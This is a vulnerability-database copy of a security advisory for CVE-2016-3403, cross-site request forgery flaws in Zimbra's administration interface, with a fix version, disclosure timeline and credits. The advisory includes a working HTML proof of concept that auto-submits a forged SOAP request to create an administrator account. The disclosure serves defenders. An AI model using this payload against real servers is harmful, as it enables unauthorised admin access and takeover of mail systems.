Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormDamien CauquilPACKETSTORM:140484
HistoryJan 13, 2017 - 12:00 a.m.

Zimbra Cross Site Request Forgery

2017-01-1300:00:00
Damien Cauquil
packetstormsecurity.com
49

EPSS

0.005

Percentile

76.7%

JSON
`# CVE-2016-3403: Multiple CSRF in Zimbra Administration interface  
  
## Description  
  
Multiple CSRF vulnerabilities have been found in the administration  
interface of Zimbra, giving possibilities like adding, modifying and  
removing admin accounts.  
  
## Vulnerability  
  
Every forms in the Administration part of Zimbra are vulnerable to CSRF  
because of the lack of a CSRF token identifying a valid session. As a  
consequence, requests can be forged and played arbitrarily.  
  
**Access Vector**: remote  
**Security Risk**: low  
**Vulnerability**: CWE-352  
**CVSS Base score**: 5.8  
  
## Proof of Concept  
  
```html  
<html>  
<body>  
<form enctype="text/plain" id="trololo"  
action="https://192.168.0.171:7071/service/admin/soap/CreateAccountRequest"  
method="POST">  
<input name='<soap:Envelope  
xmlns:soap="http://www.w3.org/2003/05/soap-envelope"><soap:Header><context  
xmlns="urn:zimbra"><userAgent xmlns="" name="DTC"/><session xmlns=""  
id="1337"/><format xmlns=""  
type="js"/></context></soap:Header><soap:Body><CreateAccountRequest  
xmlns="urn:zimbraAdmin"><name xmlns="">[email protected]</name><password  
xmlns="">test1234</password><a xmlns=""  
n="zimbraAccountStatus">active</a><a xmlns=""  
n="displayName">ItWorks</a><a xmlns="" n'  
  
value='"sn">itworks</a><a xmlns=""  
n="zimbraIsAdminAccount">TRUE</a></CreateAccountRequest></soap:Body></soap:Envelope>'/>  
</form>  
<script>  
document.forms[0].submit();  
</script>  
</body>  
</html>  
```  
  
## Solution  
  
* Upgrade to version 8.7  
  
## Affected versions  
  
* All versions previous to 8.7  
  
## Fixes  
  
* https://bugzilla.zimbra.com/show_bug.cgi?id=100885  
* https://bugzilla.zimbra.com/show_bug.cgi?id=100899  
  
## Timeline (dd/mm/yyyy)  
  
* 24/02/2016: Issue reported to Zimbra  
* 24/02/2016: Issue aknwoledged  
* 20/06/2016: complete fixes released with version 8.7  
  
## Credits  
  
* Anthony LAOU-HINE TSUEI, Sysdream (laouhine_anthony -at- hotmail  
-dot- fr)  
* Damien CAUQUIL, Sysdream (d.cauquil -at- sysdream -dot- com)  
  
  
  
  
`

Related

nvd 2
prion 1
cvelist 1
cve 2
nvd
nvd
CVE-2016-3403
2017-05-17 14:29:00
CVE-2015-6542
2017-05-12 14:29:00
prion
prion
Cross site request forgery (csrf)
2017-05-17 14:29:00
cvelist
cvelist
CVE-2016-3403
2017-05-17 14:00:00
cve
cve
CVE-2016-3403
2017-05-17 14:29:00
CVE-2015-6542
2017-05-12 14:29:00

EPSS

0.005

Percentile

76.7%

JSON
Related for PACKETSTORM:140484
nvd2prion1cvelist1cve2